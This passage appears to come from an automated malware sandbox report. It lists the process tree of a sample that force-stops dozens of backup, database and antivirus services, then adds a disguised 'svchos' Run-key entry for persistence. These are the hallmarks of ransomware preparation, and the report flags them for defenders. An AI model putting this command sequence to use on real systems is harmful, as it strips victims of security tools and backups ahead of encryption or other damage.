C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ShMonitor /y4⤵PID:1472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y5⤵PID:1960
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Smcinst /y4⤵PID:2448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y5⤵PID:2920
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SmcService /y4⤵PID:1792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y5⤵PID:2664
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SMTPSvc /y4⤵PID:2132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y5⤵PID:2640
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SNAC /y4⤵PID:2452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SNAC /y5⤵PID:2828
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SntpService /y4⤵PID:2632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y5⤵PID:2396
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sophossps /y4⤵PID:2280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y5⤵PID:764
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y4⤵PID:2364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y5⤵PID:3052
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y4⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y5⤵PID:2744
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y4⤵PID:1764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y5⤵PID:2392
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y4⤵PID:2544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y5⤵PID:2576
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y4⤵PID:3004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y5⤵PID:2464
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y4⤵PID:2520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y5⤵PID:1288
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y4⤵PID:2876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y5⤵PID:1372
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y4⤵PID:2456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y5⤵PID:2332
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y4⤵PID:1760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y5⤵PID:2916
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPS /y4⤵PID:1724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y5⤵PID:2792
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y4⤵PID:2812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y5⤵PID:2840
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y5⤵PID:3056
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y4⤵PID:2604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y5⤵PID:2388
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLBrowser /y4⤵PID:1840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y5⤵PID:2928
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSafeOLRService /y4⤵PID:2904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y5⤵PID:2924
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y4⤵PID:328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y5⤵PID:2236
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY /y4⤵PID:2912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y5⤵PID:2372
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y4⤵PID:2752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y5⤵PID:2536
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLWriter /y4⤵PID:2756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y5⤵PID:2188
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SstpSvc /y4⤵PID:2832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y5⤵PID:1244
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop svcGenericHost /y4⤵PID:2152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y5⤵PID:2512
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_filter /y4⤵PID:1640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y5⤵PID:3012
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_service /y4⤵PID:2292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y5⤵PID:2720
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update_64 /y4⤵PID:2424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y5⤵PID:1668
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TmCCSF /y4⤵PID:2592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y5⤵PID:1228
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop tmlisten /y4⤵PID:1644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y5⤵PID:2656
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKey /y4⤵PID:3048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y5⤵PID:2468
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyScheduler /y4⤵PID:2956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y5⤵PID:2248
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y4⤵PID:1072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y5⤵PID:2736
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop UI0Detect /y4⤵PID:2228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y5⤵PID:3000
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBackupSvc /y4⤵PID:1624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y5⤵PID:1792
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y4⤵PID:1472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y5⤵PID:2496
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y4⤵PID:2068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y5⤵PID:3064
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCloudSvc /y4⤵PID:2684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y5⤵PID:2336
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploymentService /y4⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y5⤵PID:1996
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamDeploySvc /y4⤵PID:2772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y5⤵PID:2084
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y4⤵PID:2364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y5⤵PID:960
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamMountSvc /y4⤵PID:2716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y5⤵PID:2316
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamNFSSvc /y4⤵PID:2788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y5⤵PID:2088
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamRESTSvc /y4⤵PID:2132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y5⤵PID:828
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamTransportSvc /y4⤵PID:2000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y5⤵PID:2300
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop W3Svc /y4⤵PID:1312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y5⤵PID:2432
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y4⤵PID:428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y5⤵PID:2668
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop WRSVC /y4⤵PID:2320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y5⤵PID:2244
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:3004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y5⤵PID:2456
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:2332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y5⤵PID:2128
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y4⤵PID:1760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y5⤵PID:2824
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update /y4⤵PID:2992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y5⤵PID:1032
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y4⤵PID:1256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y5⤵PID:1660
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y4⤵PID:544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y5⤵PID:1896
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQL Backups" /y4⤵PID:540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups" /y5⤵PID:2588
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROD /y4⤵PID:2624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y5⤵PID:2924
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y4⤵PID:2572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service" /y5⤵PID:2344
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y4⤵PID:3032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y5⤵PID:2832
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROD /y4⤵PID:2360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y5⤵PID:2212
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop msftesql$PROD /y4⤵PID:652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y5⤵PID:2536
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop NetMsmqActivator /y4⤵PID:2200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y5⤵PID:1752
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EhttpSrv /y4⤵PID:1376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y5⤵PID:1120
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ESHASRV /y4⤵PID:1668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y5⤵PID:1640
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ekrn /y4⤵PID:3040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y5⤵PID:3012
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y4⤵PID:2616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y5⤵PID:1632
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y4⤵PID:956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y5⤵PID:2380
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AVP /y4⤵PID:2324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y5⤵PID:2472
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop klnagent /y4⤵PID:1644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y5⤵PID:1972
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y4⤵PID:1672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y5⤵PID:304
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y4⤵PID:2552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y5⤵PID:2920
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop wbengine /y4⤵PID:2900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y5⤵PID:2232
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop kavfsslp /y4⤵PID:1072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y5⤵PID:2448
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFSGT /y4⤵PID:2496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y5⤵PID:1816
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop KAVFS /y4⤵PID:2884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y5⤵PID:2684
-
-
-
[depth 4] C:\Windows\System32\net.exe | "C:\Windows\System32\net.exe" stop mfefire /y | PID:2340
[depth 5] C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop mfefire /y | PID:2420
[depth 4] C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\aCBlj.exe" /f | PID:1540
[depth 5] C:\Windows\system32\reg.exe | REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\users\Public\aCBlj.exe" /f | PID:2084
    Signature: Adds Run key to start application
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "49292760911824047601713768551-13609149652138848815234813462-1354040014-1576991462" | PID:2184
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "181265466510080933891153529039-744618971909865188-2087158886-1377079235-889850515" | PID:3056
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-1510268686-445233881-1370159665481753691688363120317980511-67886349724032549" | PID:2784
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-484858561879949640-1080418893959233827-147140800636686608-606569290-1988301528" | PID:616
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "1171676860-7570759481971276166205304423917764698770944631894004630702013179" | PID:1348
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-4440116541089757008-15396053451983307702-1450606030-177242504-1086286471-1072557347" | PID:1792
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-108447273913969585782051962440-114552774117216242536031249777970416-1802442741" | PID:2520
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-3566714691190449294-58543920383428077-1095539277-52871211232210352587639592" | PID:564
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-10431177411552466418331795750-310495189-1527028303-5069684551524641311-568838226" | PID:1108
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "169745146617134351871613656063-1923302307-138210608624258488919213232921140672302" | PID:2344
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "16319317131452541462101579832-19734458471129945224-1323712742-18809400971898385953" | PID:2696
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "773251363-19288581251597858232-504002407-1601479909-307220607-1597314872216337762" | PID:1376
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-762841541-266297831178069147293928204-17062407038804013581543232989160746963" | PID:1540
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "1779867140894501814-1300322929-1677696514-18865677109654050578430534931966212799" | PID:2240
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "669333195-8466812091403471957-8909091384140693852052656120198828894-716170236" | PID:1172
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-519124998-4852590601266036023194624404373557271-1224683684-2110210519-58311032" | PID:2220
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "1202454660-2099604210-2455088653512964011812725374184379081-17414225301455098644" | PID:984
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "182717077917535517651387887679-1501132767-39551803817090868601260651582-1286587935" | PID:2608
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "408898415744717338844790787263843541136091916373031541-667261120-313541732" | PID:2784
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-15351565541867429891151073950740618644-186282481316631413631391871379435118000" | PID:916
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-3399368681027089969-441866599-1035538011559769236-630773661183424059585915795" | PID:2280
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "180725459-1602870377-3588563416371873369871340611913489780-369930237-143122945" | PID:2576
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "975537676-840932900-17842381914226860101090063903-263633971-18005702491547281508" | PID:1372
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "117754715234638602-8554423571307663267856368871131070802859391077-634186041" | PID:2792
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-1412013668-14084596-1221082302-1705711239-767958842-2017669912-21199532-1310085423" | PID:2916
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-1745562591152587442-330769118215442580-102786621877492116311809474701765536933" | PID:2236
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-1031718030-232794762147319524-2061205003-8855940801776124931606612105-604896792" | PID:2388
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "128694380438776447313100743011272049313-612306023-8558954801198096464892876005" | PID:832
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "1167431056-808866167-761971904-1209379004181544782212958229981693238603-306006216" | PID:2372
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-682937783-8176710991108214549-2106705014184823273-12481773141191835683660454319" | PID:1876
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-224819285-790500775-508688610316409205906497131-666465444487328479925455816" | PID:2424
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "-426506928168182492023625669122327775411035867772097355991-361951038929596916" | PID:3048
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "51628524951035884126293087438907443020177063231900555200-14721554591946163253" | PID:1472
[depth 1] C:\Windows\system32\conhost.exe | \??\C:\Windows\system32\conhost.exe "5582236121458453934127618460170431757421423869571357916918-2564199361685300056" | PID:2452
[depth 1] C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | PID:1312
    Signature: Suspicious use of AdjustPrivilegeToken
[depth 1] C:\Windows\system32\Dwm.exe | "C:\Windows\system32\Dwm.exe" | PID:2420